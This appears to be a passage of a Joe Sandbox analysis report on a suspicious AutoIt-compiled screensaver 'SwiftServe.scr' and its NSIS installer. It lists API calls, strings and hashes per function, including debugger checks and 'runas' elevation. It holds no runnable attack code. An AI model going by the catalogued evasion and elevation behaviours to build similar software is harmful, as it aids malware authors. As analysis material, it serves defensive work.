Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c30e874c0dd13dafab9eec4149781a552473f0f0671de2e9495985384250c353
Instruction ID: e53b0d2e07ed5cc42b65f46c088a0ffbd9ee82f7db84de32081c625a94508254
Opcode Fuzzy Hash: c30e874c0dd13dafab9eec4149781a552473f0f0671de2e9495985384250c353
Instruction Fuzzy Hash: C9E0ECB0900219ABEB009F64DE49D7B7FBCFB40305B408526A955E2250D778D8148AA8

Function 004062B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E8F,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062C6
wvsprintfW.USER32(00000000,?,?), ref: 004062DD

Part of subcall function 004060FD: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062EA,00000000), ref: 00406114

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062BB, 004062C0

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7855ac2f6164c7a2629bb99e179585e0bc82677cf2e10cbf779388d075bdbb21
Instruction ID: 2883f6fdbb75122e7c86ea7043297328e8e8306c32113c26ceb0f942655100f9
Opcode Fuzzy Hash: 7855ac2f6164c7a2629bb99e179585e0bc82677cf2e10cbf779388d075bdbb21
Instruction Fuzzy Hash: 1ED0523429460EAACA009BA0EE1DE1A3B79EF80304F84843EF046820B0EA389002CB0D

Function 00405DCC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00406BE9,?,00000000,00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405DDC
lstrcmpiA.KERNEL32(00000000,00406BE9), ref: 00405DF4
CharNextA.USER32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E05
lstrlenA.KERNEL32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E0E

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 154379d1c5420fb8949bca2a3232bbf94181924a40fc586370f8f53582277720
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: 1AF06235105558EFC7019FA5DD0499F7BA8EF56350B2540AAE840E7311D634DE019FA9

Analysis Process: SwiftServe.scrPID: 2828, Parent PID: 7444COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	126

Executed Functions

Function 00E35240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E3526C
IsDebuggerPresent.KERNEL32 ref: 00E3527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E352E6

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

Part of subcall function 00E2BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E2BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00E35366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E70B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00E70B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00ED6D10), ref: 00E70BE9
ShellExecuteW.SHELL32(00000000), ref: 00E70BF0

Part of subcall function 00E3514C: GetSysColorBrush.USER32(0000000F), ref: 00E35156
Part of subcall function 00E3514C: LoadCursorW.USER32(00000000,00007F00), ref: 00E35165
Part of subcall function 00E3514C: LoadIconW.USER32(00000063), ref: 00E3517C
Part of subcall function 00E3514C: LoadIconW.USER32(000000A4), ref: 00E3518E
Part of subcall function 00E3514C: LoadIconW.USER32(000000A2), ref: 00E351A0
Part of subcall function 00E3514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E351C6
Part of subcall function 00E3514C: RegisterClassExW.USER32(?), ref: 00E3521C

Part of subcall function 00E350DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E35109
Part of subcall function 00E350DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E3512A
Part of subcall function 00E350DB: ShowWindow.USER32(00000000), ref: 00E3513E
Part of subcall function 00E350DB: ShowWindow.USER32(00000000), ref: 00E35147

Part of subcall function 00E359D3: _memset.LIBCMT ref: 00E359F9
Part of subcall function 00E359D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E35A9E

Strings

AutoIt, xrefs: 00E70B23
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E70B28
runas, xrefs: 00E70BE4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: c2f5474f68bc86efba7bf7afe835640c8a8829c8d045636c154133d78eaaeeda
Instruction ID: 0ea2c6050b751b3c49b72bcc21580a1a2725a5ff6014e3b3ca1d8ebd28474ed9
Opcode Fuzzy Hash: c2f5474f68bc86efba7bf7afe835640c8a8829c8d045636c154133d78eaaeeda
Instruction Fuzzy Hash: 6051087190428CAECB01ABF1DC4AEEE7FB4EB49344F1471A9F59176272CA705609C720

Function 00E35D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00E35D40

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

GetCurrentProcess.KERNEL32(?,00EB0A18,00000000,00000000,?), ref: 00E35E07
IsWow64Process.KERNEL32(00000000), ref: 00E35E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E35E54
FreeLibrary.KERNEL32(00000000), ref: 00E35E5F
GetSystemInfo.KERNEL32(00000000), ref: 00E35E90
GetSystemInfo.KERNEL32(00000000), ref: 00E35E9C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 7da245f414c3ab71d57abe2c8993bd4a4a5f53c122106f4ace5b40c7cb76e0ed
Instruction ID: 5518c0358aeba458ddda8cb669a04da5719bdba9eeaa327e678340e9c0a8257d
Opcode Fuzzy Hash: 7da245f414c3ab71d57abe2c8993bd4a4a5f53c122106f4ace5b40c7cb76e0ed
Instruction Fuzzy Hash: F791B33254ABC0DEC731CB7984545ABBFE56F2A304F885A9ED0CBA3B41D230B648D759

Function 00E2B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00E33740: CharUpperBuffW.USER32(?,00EE71DC,00000001,?,00000000,00EE71DC,?,00E253A5,?,?,?,?), ref: 00E3375D

_memmove.LIBCMT ref: 00E2B68A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: 02ffbb6b2a29cc95cfb361f5abc2dd6cf251b4eaf3a40bed4bbf50bcb0d3d612
Instruction ID: 9f1f1bc098f796647c66fb3e04b3cecb2826d305013a561d5629e89c742b75d6
Opcode Fuzzy Hash: 02ffbb6b2a29cc95cfb361f5abc2dd6cf251b4eaf3a40bed4bbf50bcb0d3d612
Instruction Fuzzy Hash: DAA28B716083518FD720DF24E480B6AB7E1FF84304F14A96DE89AAB361D771ED85CB92

Function 00E294E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bc20aae255f617440bdd5c83c450856f9de41586f24bd87ddd654b3bcd1bb4
Instruction ID: 86690f1f2527f180708d1a83f24bde5502747b6e53d17f3fe3f3209c897bc370
Opcode Fuzzy Hash: 12bc20aae255f617440bdd5c83c450856f9de41586f24bd87ddd654b3bcd1bb4
Instruction Fuzzy Hash: EC22D070A04225CFDB18DF54E490AAEB7F0FF49314F18A16AE956BB352D330AD81CB91

Function 00E2BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00E2BF57

Part of subcall function 00E252B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E252E6

Sleep.KERNEL32(0000000A,?,?), ref: 00E636B5

Strings

@GUI_CTRLID, xrefs: 00E6376C
@TRAY_ID, xrefs: 00E63FCD
@GUI_WINHANDLE, xrefs: 00E637C1
@GUI_CTRLHANDLE, xrefs: 00E63816
CALL, xrefs: 00E2C277
@COM_EVENTOBJ, xrefs: 00E63D2E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: 5ac957e5b91bbe452f2d90b7f69b3c067b7f439b67dbf3e6f076e40312b31025
Instruction ID: 04f9845b29211b1f6198b5b5edb2efdcf7d84b400fd3dd5e6010a9378a95ba82
Opcode Fuzzy Hash: 5ac957e5b91bbe452f2d90b7f69b3c067b7f439b67dbf3e6f076e40312b31025
Instruction Fuzzy Hash: BBC2BF70608351DFD728DF24E894BAAB7E4BF84344F14A91DF49AB72A1CB71E944CB42

Function 00E233E6 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E23444
RegisterClassExW.USER32(00000030), ref: 00E2346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E2347F
InitCommonControlsEx.COMCTL32(?), ref: 00E2349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E234AC
LoadIconW.USER32(000000A9), ref: 00E234C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E234D1

Strings

AutoIt v3 GUI, xrefs: 00E23460
TaskbarCreated, xrefs: 00E23474
+, xrefs: 00E2342D
0, xrefs: 00E23426

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: da7be090842a9ab690336b5ba9845d6ad2867ddb94e5b1dc6ac79f4768506d71
Instruction ID: 45ce3ebce2ea7685301eca6704b67567dd9a7fd57de30b974f6fa18685e177ff
Opcode Fuzzy Hash: da7be090842a9ab690336b5ba9845d6ad2867ddb94e5b1dc6ac79f4768506d71
Instruction Fuzzy Hash: 89315C718443599FDB409FA5EC89ACEBBF0FB09310F10425AF590B62A0E7B5154ACF94

Function 00E23411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E23444
RegisterClassExW.USER32(00000030), ref: 00E2346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E2347F
InitCommonControlsEx.COMCTL32(?), ref: 00E2349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E234AC
LoadIconW.USER32(000000A9), ref: 00E234C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E234D1

Strings

AutoIt v3 GUI, xrefs: 00E23460
TaskbarCreated, xrefs: 00E23474
+, xrefs: 00E2342D
0, xrefs: 00E23426

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: fc0fbed62eb395a4eda7940fe453b7e9ec2465499dc68f54cf8320b37684ed99
Instruction ID: 15534db70e86018b870942e6a028b67c34f09b825ba3e368b68c999d5595d561
Opcode Fuzzy Hash: fc0fbed62eb395a4eda7940fe453b7e9ec2465499dc68f54cf8320b37684ed99
Instruction Fuzzy Hash: B521E7B191436DAFEB009F95EC89B9EBBF4FB08700F10421AF550BA2A0D7B15548CF95

Function 00E32FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E400CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E33094), ref: 00E400ED

Part of subcall function 00E408C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E3309F), ref: 00E408E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E330E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E701BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E701FB
RegCloseKey.ADVAPI32(?), ref: 00E70239
_wcscat.LIBCMT ref: 00E70292

Strings

Include, xrefs: 00E701B1, 00E701F2
\Include\, xrefs: 00E3309F
\, xrefs: 00E702B5
Software\AutoIt v3\AutoIt, xrefs: 00E330D8

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: bb6af436e6adb7c052e8a3816ca1855d62987e9740abc0e9844958b16602f339
Instruction ID: 0cc0392bb2ab5123280a9f30f6d3a8d88a661afc6482856c9300378a8838324d
Opcode Fuzzy Hash: bb6af436e6adb7c052e8a3816ca1855d62987e9740abc0e9844958b16602f339
Instruction Fuzzy Hash: F87182714093459EC304EF66E98599BBBE8FF88340F40692EF649BB1B1EF309948CB51

Function 00E3514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E35156
LoadCursorW.USER32(00000000,00007F00), ref: 00E35165
LoadIconW.USER32(00000063), ref: 00E3517C
LoadIconW.USER32(000000A4), ref: 00E3518E
LoadIconW.USER32(000000A2), ref: 00E351A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E351C6
RegisterClassExW.USER32(?), ref: 00E3521C

Part of subcall function 00E23411: GetSysColorBrush.USER32(0000000F), ref: 00E23444
Part of subcall function 00E23411: RegisterClassExW.USER32(00000030), ref: 00E2346E
Part of subcall function 00E23411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E2347F
Part of subcall function 00E23411: InitCommonControlsEx.COMCTL32(?), ref: 00E2349C
Part of subcall function 00E23411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E234AC
Part of subcall function 00E23411: LoadIconW.USER32(000000A9), ref: 00E234C2
Part of subcall function 00E23411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E234D1

Strings

AutoIt v3, xrefs: 00E3520B
0, xrefs: 00E351FA
#, xrefs: 00E35201

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: a9dabd4715a30c549c1b21b1ec11cb5ed8fa1a6688b65fcfed1cffbc28cddc2c
Instruction ID: bca841d6bbcea14ca27670e751ea0fb4dd8c7fda2098ef4815afb298cdee80f1
Opcode Fuzzy Hash: a9dabd4715a30c549c1b21b1ec11cb5ed8fa1a6688b65fcfed1cffbc28cddc2c
Instruction Fuzzy Hash: 212159B1D04358AFEB109FA6ED89B9E7BB4FB08310F00015AF644BA2B0C7B56558CF80

Function 00E34D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00E34E22
KillTimer.USER32(?,00000001), ref: 00E34E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E34E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E34E7A
CreatePopupMenu.USER32 ref: 00E34E8E
PostQuitMessage.USER32(00000000), ref: 00E34EAF

Strings

TaskbarCreated, xrefs: 00E34E75

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: ba2f684433dc2b5f1245bff9b1f98da03f1043075a940cc03f89467c96dd09e9
Instruction ID: c12bd3829fc4af37618c247238a40e1b5e43013de85f1e8b1a087d3cc973d3ec
Opcode Fuzzy Hash: ba2f684433dc2b5f1245bff9b1f98da03f1043075a940cc03f89467c96dd09e9
Instruction Fuzzy Hash: BC4126B120824AAFDB156F26EC4DBBF7E94F784304F002225F685B92E1CA64BC14D761

Function 00E2AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E2ADE1
OleUninitialize.OLE32(?,00000000), ref: 00E2AE80
UnregisterHotKey.USER32(?), ref: 00E2AFD7
DestroyWindow.USER32(?), ref: 00E62F64
FreeLibrary.KERNEL32(?), ref: 00E62FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E62FF6

Strings

close all, xrefs: 00E2ADDC

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ff7996a70767e3e91b547a465a1c4ccd5b7a300aac84288a5d9b601e48790b18
Instruction ID: e852320f0d14e758bef1fdeccd106e40db2a61f4c64b80ddec730bd0128ef6af
Opcode Fuzzy Hash: ff7996a70767e3e91b547a465a1c4ccd5b7a300aac84288a5d9b601e48790b18
